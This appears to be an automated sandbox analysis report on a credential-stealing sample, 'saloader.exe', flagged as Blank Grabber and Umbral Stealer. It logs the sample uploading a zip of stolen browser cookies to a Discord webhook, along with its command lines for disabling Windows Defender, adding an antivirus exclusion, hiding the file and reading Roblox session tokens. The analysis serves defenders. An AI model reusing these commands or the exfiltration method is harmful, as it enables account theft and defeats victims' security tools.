                                                                                        2024-11-30 01:30:04 UTC97INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 61 37 31 31 65 63 65 65 63 35 39 65 31 37 2d 45 57 52 0d 0a 0d 0a 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8ea711eceec59e17-EWR{"message": "Unknown Webhook", "code": 10015}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749819162.159.129.233443520C:\Users\user\Desktop\saloader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 01:30:05 UTC534OUTPOST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1
                                                                                        Accept: application/json
                                                                                        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                        Content-Type: multipart/form-data; boundary="0fc477bf-c5b0-4025-8bca-1c50d6ea02f2"
                                                                                        Host: discordapp.com
                                                                                        Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000
                                                                                        Content-Length: 655373
                                                                                        Expect: 100-continue
                                                                                        2024-11-30 01:30:05 UTC40OUTData Raw: 2d 2d 30 66 63 34 37 37 62 66 2d 63 35 62 30 2d 34 30 32 35 2d 38 62 63 61 2d 31 63 35 30 64 36 65 61 30 32 66 32 0d 0a
                                                                                        Data Ascii: --0fc477bf-c5b0-4025-8bca-1c50d6ea02f2
                                                                                        2024-11-30 01:30:05 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 36 31 30 39 33 30 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 36 31 30 39 33 30 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-610930.zip; filename*=utf-8''Umbral-610930.zip
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 c8 ad 7d 59 9c 5c 22 6e ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 d0 84 90 44 16 5d 50 84 0a 11 44 8a 50 dc 38 54 fe 83 f2 17 e5 f4 ed 09 fa 0e f0 c4 bc 69 f2 3a 15 af cd 0d f8 de 49 07 6f c0 50 f7 5f 3a 40 18 cb 98 10 86 65 a4 30 2a 6f 14 80 dc 8b a5 7a 40 82 12 16 10 14 20 11 20 5b af c4 7f 02 42 19 a3 44 86 7f 01 c1 18 38 e6 16 10 84 de ef 4e 9c 74 a1 32 f9 d7 08 1e 5c 6a e2 38 bb f7 0c 35 54 5f e2 68 3f 24 6d 28 9f f4 c8 c1 8f a8 bb f4 3f 5e ef 18 4f 1b 55 cd e2 7e 4e 45 75 f0 3e ce 9c db 8b 34 26 db 36 48 59 e2 4c 7e d8 ca da 8b 0b cb 48 cc 81 ce 81 5e 3f d2 50 cd f8 31 9f 1d ab e4 7c
                                                                                        Data Ascii: PK}Y\"n!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(D]PDP8Ti:IoP_:@e0*oz@ [BD8Nt2\j85T_h?$m(?^OU~NEu>4&6HYL~H^?P1|
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: d6 40 ff 31 c2 1a 77 6c 7e bb 26 d1 82 e8 e4 b5 43 55 67 96 c3 5b 91 a7 83 1d 00 8b 74 26 dc 98 b0 4b 48 ff df a4 ba 55 df 55 0f 38 c6 fd 1a 87 f9 d7 da 1e 17 f2 db 43 fe f3 bc 77 0a 81 21 99 19 9b 38 3e 15 3f 63 4e 38 33 98 fd db 8d 32 11 08 3b 27 cb d9 da 38 73 1c da 6a 54 8e 07 5e 78 d5 2c 27 ae 74 3b a6 5b 33 d6 09 da 7e b2 97 43 09 c5 f2 7c 8f 97 8b 74 b5 7a 0e f9 d0 be e2 f6 96 c0 2b eb d5 ba ea 6c a4 8f e3 46 c4 78 71 f1 f8 9d 5d d2 05 df 3f de b9 3c ab 51 09 3c fd 5d b6 e4 d4 ed bd 9e ba 6a f3 4d 90 5f 32 09 de cc 70 1b da 23 b1 4d 8f 5a 2f b5 ef 7d 46 74 06 42 7a 35 7c 58 ea cf dd 8c ea 13 7e 2a a6 40 f9 ae 11 60 b5 29 29 f0 f3 d0 5d 1c e7 26 63 d1 3e 96 ef fb a8 6d b5 65 99 78 4e a9 05 d7 fc e6 39 bc db 55 09 70 f8 ca 16 08 44 e3 23 dc 2d ee 15
                                                                                        Data Ascii: @1wl~&CUg[t&KHUU8Cw!8>?cN832;'8sjT^x,'t;[3~C|tz+lFxq]?<Q<]jM_2p#MZ/}FtBz5|X~*@`))]&c>mexN9UpD#-
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 8b b3 e9 cf dd b3 b4 04 e6 21 e4 ae c0 53 37 de d8 da a4 f8 2a ab d6 97 6c 82 a8 6e 06 ec 39 68 37 a4 33 3b d4 be 97 e2 83 b8 ab 9f c3 46 15 8f 14 7c 87 22 d8 3c 62 c4 ba a5 57 78 91 a1 e0 d1 3d 1d 45 70 81 49 76 bc 38 1f 6a 91 0f 55 3e c0 97 b0 de 0b fb 04 0b 3d 36 33 12 5d 42 c0 87 20 b3 8b e3 28 df f2 5e 38 96 5d d4 8b 43 7f e6 a0 6c d2 1e ac 1e 09 69 e8 88 16 8c cc 03 82 19 e1 ea 93 6a 4a ab f0 52 91 28 b9 49 75 6c ca 37 11 4b 40 e5 c4 84 1e ff ea 5a d5 6f 32 2d b3 c2 c8 91 2d c2 3e 92 8c e8 3b 24 80 6a df 10 45 37 1e 69 77 21 46 65 0e a2 07 a5 ae f3 1c 26 1e 78 55 d0 6a 17 86 ce 34 81 7b 94 8e 45 33 a3 aa 59 86 af 04 cd a3 3b f9 50 9a 92 4d 27 98 48 bc 8b 92 28 a4 68 47 11 58 d0 9c b1 1e ee c8 bf 3e a4 e3 e7 da e8 7b d1 6b 52 6a 4d 41 ba 83 4d a6 f4
                                                                                        Data Ascii: !S7*ln9h73;F|"<bWx=EpIv8jU>=63]B (^8]ClijJR(Iul7K@Zo2-->;$jE7iw!Fe&xUj4{E3Y;PM'H(hGX>{kRjMAM
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 9e 27 16 8c 4e 01 2a fb 63 3d 3c d5 6e a3 47 06 03 b0 24 53 1d 80 c0 44 04 05 35 95 70 15 40 1e 3d fc 52 f1 d1 5a ba 4c 94 cc 97 84 07 77 ca 1e d7 55 38 f3 cf 8e 41 f7 57 b5 78 3c cc 76 fd dd 67 94 3f c5 e6 ce 9b 3a 1e 23 f6 ab 8c b4 0e 6d 5e 3e 8c c3 d8 38 f8 d0 6b 9e d0 24 2d b3 41 c3 32 94 fb be b8 28 bd 82 0d 57 bc 39 ac 2e ff 2c 33 03 e3 db b1 f1 23 f2 fc 19 c2 dd 18 fa 34 4e c6 f1 b3 f4 ef e5 90 fd 8b 95 2d f0 ea 93 d7 a6 fb 28 c0 be 3e 70 bb 1c 78 b9 69 9a f6 d9 21 b2 0c fc fe 2d bc cb ce 99 d9 4e 06 77 38 84 83 34 2c 63 97 0e 4f c7 84 44 c7 19 99 ee f0 37 19 88 09 0d a1 f6 da 16 3c 93 04 0d 91 74 6a f7 90 53 f8 f2 d4 cb 21 52 30 c2 cd b2 7c ac 9d 59 17 1b f8 1e a1 37 60 d4 46 51 a4 df ab 41 24 09 86 2c 1c a6 40 d1 a5 32 71 8e 66 fc b3 06 2d a6 8c
                                                                                        Data Ascii: 'N*c=<nG$SD5p@=RZLwU8AWx<vg?:#m^>8k$-A2(W9.,3#4N-(>pxi!-Nw84,cOD7<tjS!R0|Y7`FQA$,@2qf-
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 4b 0b 87 bd 46 0e 3d 23 f9 9f 2b fc 90 0c 3a 4e 8d 09 6b 4d 0e 7a 27 3a 60 2d aa 9c a8 0a 5b 3f 45 62 d5 ff 9e d6 e7 14 72 c8 6c b2 fb 10 8c ca 65 9d fa a3 08 55 46 cb 64 53 be aa c6 81 3c 99 19 95 9e bc bf 8a 6e 16 80 32 3b ae da 05 9e ce 62 c4 37 ef 4c 7f f8 88 ae cb a5 f1 6f ae a2 ed a0 7c a1 fa a9 fe 96 74 c9 b4 30 0e 1e 50 c6 d5 86 4e d9 7a 7e a6 00 a1 dc 57 bd 87 04 d9 be bc 36 b0 7a e9 10 5c de c6 25 13 70 f1 3b 1f c1 fd 48 e1 79 57 e3 6a f2 55 d4 6f 04 31 5d ea 18 ec b6 0b c5 5c 24 35 c4 c5 40 13 5b 03 d0 7b de 99 87 a0 68 42 d7 f9 6f c6 f1 24 87 01 e8 ae 48 07 8c c8 17 9a af 6c b2 20 df a3 09 82 be 58 c4 05 69 9e f0 3a 3d c3 39 79 9a d5 e9 32 db 2c 8d ab ed 75 68 d3 e9 c8 21 13 b4 5d 21 9c a7 c3 98 34 12 d0 27 ab 2d 99 db 9a 78 b6 c5 50 d3 18 7d
                                                                                        Data Ascii: KF=#+:NkMz':`-[?EbrleUFdS<n2;b7Lo|t0PNz~W6z\%p;HyWjUo1]\$5@[{hBo$Hl Xi:=9y2,uh!]!4'-xP}
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: af ca 8d 81 1b ec 71 95 33 94 d4 e9 d7 67 00 9b 14 5c 3e 6d 4c 06 34 e2 5b 0c 75 ee a9 04 0f 6c 7e 78 24 a8 01 23 98 6e 77 cd 05 a1 b3 5b 4c 90 86 ce 82 d8 6e dd c5 d9 f1 74 2d 63 5d 68 6e 8b d9 a8 91 e9 b4 c8 2c ea 90 f4 a2 e0 c3 12 00 b2 f8 bc 63 1d 82 fa 67 fd 98 02 f0 5c 91 61 4f 93 70 56 04 92 c2 92 50 80 3d b5 10 b0 9a 92 3f 24 14 c6 8b 51 31 a2 76 84 11 1e a5 ee bd 7c e2 be cb 3a 16 08 05 26 2f ae 11 f2 06 3b 21 b7 ff 61 35 d8 17 6b 95 fe 37 f2 34 bc a4 c5 ec 98 df d3 f4 1e c3 3b 56 7b df 6a 3e 24 84 39 6c 1a 65 a5 77 3c c3 9c 53 9a 3d 8e a5 5d 78 f5 33 cc 18 01 85 63 20 ce da 97 8a f7 3e ce 98 75 d9 18 a2 33 6a 4c cc f9 6c f5 7e e9 34 95 d1 58 09 a4 3d 25 ac bb 45 c3 ac 2a 67 d0 6c 46 9d 96 1c d1 8d 80 e6 6a ae 5d b2 d8 93 1a bd cb e7 df 7d a9 3d
                                                                                        Data Ascii: q3g\>mL4[ul~x$#nw[Lnt-c]hn,cg\aOpVP=?$Q1v|:&/;!a5k74;V{j>$9lew<S=]x3c >u3jLl~4X=%E*glFj]}=
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 14 00 d2 e6 2e fc 00 b1 3b ec 28 78 27 56 55 7e 4f d9 d2 b4 bd d7 0e 74 f3 ee d4 cc 4c 92 53 80 2f 46 ee e0 a0 d7 27 bf 24 e6 b9 15 a5 1d 44 68 fe 9f f6 08 f3 c3 af 11 f6 70 f5 95 c4 3f 33 42 62 1e 88 22 43 3b 0d e7 ae 88 63 72 b1 a1 5d 4a e6 b2 ba ec 8a ef 21 d6 d2 97 65 77 bf d8 f4 7e 13 d6 47 fc 05 d5 00 24 ee c3 0d 98 dd 86 1d aa d9 2e 04 5f 55 25 66 a6 19 64 3b bc 23 5a ee 6a 4e b8 6d c8 fc b5 b0 05 9b 18 4c a4 17 c5 b7 4c 9c 5f 0c 08 f9 fe 47 7a e8 67 4e 55 eb 8a c6 c1 88 71 9b 73 43 5a ab f1 bd a1 52 bb 0d 92 ab 46 79 9b e2 18 b9 10 d2 8c 1d f8 cc c0 1f 6f a1 59 4a d1 7a 60 4d f1 40 7f c6 4b ab c4 74 82 3d 34 d5 2c e1 f4 9c da 76 a4 fe c6 73 df ab 47 9e a0 d8 79 71 4d e0 10 43 93 a6 02 07 e2 d6 a7 24 7a 3d 96 a9 cd bb dd 76 75 dd c0 b6 9c d4 8f ea
                                                                                        Data Ascii: .;(x'VU~OtLS/F'$Dhp?3Bb"C;cr]J!ew~G$._U%fd;#ZjNmLL_GzgNUqsCZRFyoYJz`M@Kt=4,vsGyqMC$z=vu
                                                                                        2024-11-30 01:30:05 UTC16355OUTData Raw: 8c 71 31 f8 c9 87 95 f2 9c a0 52 4a a7 1d 1f 0b 10 30 af 75 46 c6 07 0a 08 03 b5 81 2f f0 6b 05 2a ea f8 f2 86 d1 55 ac e2 04 35 fb 7d a7 2c e6 ce c9 cb 04 77 b8 47 68 1d 12 74 7d 9b 4f 7b 58 58 a0 b9 2a 51 22 0e 93 6e f0 73 cd 48 b7 d7 25 f5 30 79 a5 8f 83 8a 9f 2c c7 61 17 03 cb cc e7 7c 42 7d 28 c9 36 e9 b3 9c 16 7a f6 27 fd b9 ea 8c 79 42 91 dd 29 55 ee 7f 8a e5 d9 d5 a0 63 76 72 ee ef f7 72 05 c7 a8 e6 1f 46 9e ab e5 0f 3f dd 98 d6 f6 bd 1f c5 b9 f1 e8 ff 27 5c 0f e5 92 12 88 ff ac 89 8d 10 8e 25 29 1b 65 00 d9 88 cd 1f 49 a6 ec 47 58 2b 6b e7 aa f2 dc 5a f0 d9 52 dd ab c5 3f a2 57 67 77 fc d0 8c c1 fd d1 9d ba ca ce 4a 5f e2 87 55 93 f0 8a fa a2 fc 2f 93 3e 34 3e f7 7f a8 42 fa 0f 91 1b 84 3f 23 c8 55 ee 05 bd 4b 04 fe 16 cb 59 8f 64 79 40 59 14 fc
                                                                                        Data Ascii: q1RJ0uF/k*U5},wGht}O{XX*Q"nsH%0y,a|B}(6z'yB)UcvrrF?'\%)eIGX+kZR?WgwJ_U/>4>B?#UKYdy@Y
                                                                                        2024-11-30 01:30:05 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-11-30 01:30:07 UTC1169INHTTP/1.1 404 Not Found
                                                                                        Date: Sat, 30 Nov 2024 01:30:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 45
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1732930208
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Set-Cookie: __cf_bm=aXbYGK.h78xwK59Y3zvJtf8zZItkbtguGaqrufqS5Dw-1732930207-1.0.1.1-PmG8kOKKAkIVtb4wQ0WSuJVmklrn60FZyzlev6m7NQ6A166jfFJVicTpcOJvPP3KlsQcjVCpiHSFRjvPTRfNQQ; path=/; expires=Sat, 30-Nov-24 02:00:07 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beVAM5BjnHJt4qYaBI7LVhsVatipCKIM7pkCxp3X2gpGcCB0rZLBaoUrHxdXCes%2FRqecfMqNxp3Nm4HTgWTmrnOuLZuINeodq5dszGmQ4Z4Um0mc%2FC525Ckt0Nn8qwFJ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ea711f969ac7cb1-EWR
                                                                                        {"message": "Unknown Webhook", "code": 10015}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:20:28:55
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Users\user\Desktop\saloader.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\saloader.exe"
                                                                                        Imagebase:0x2113d640000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:1E10AF7811808FC24065F18535CF1220
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                                                                                        Imagebase:0x7ff7e3290000
                                                                                        File size:23'040 bytes
                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:20:29:03
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:20:29:06
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                        Imagebase:0x7ff7fb730000
                                                                                        File size:496'640 bytes
                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:20:29:10
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:20:29:10
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:20:29:13
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:20:29:13
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:21:46:01
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:21:46:01
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:21:46:18
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"wmic.exe" os get Caption
                                                                                        Imagebase:0x7ff65e6e0000
                                                                                        File size:576'000 bytes
                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:21:46:18
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:21:46:19
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                        Imagebase:0x7ff65e6e0000
                                                                                        File size:576'000 bytes
                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:21:46:19
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:21:46:19
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"wmic.exe" csproduct get uuid
                                                                                        Imagebase:0x7ff65e6e0000
                                                                                        File size:576'000 bytes
                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:21:46:19
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:21:46:20
                                                                                        Start date:29/11/2024
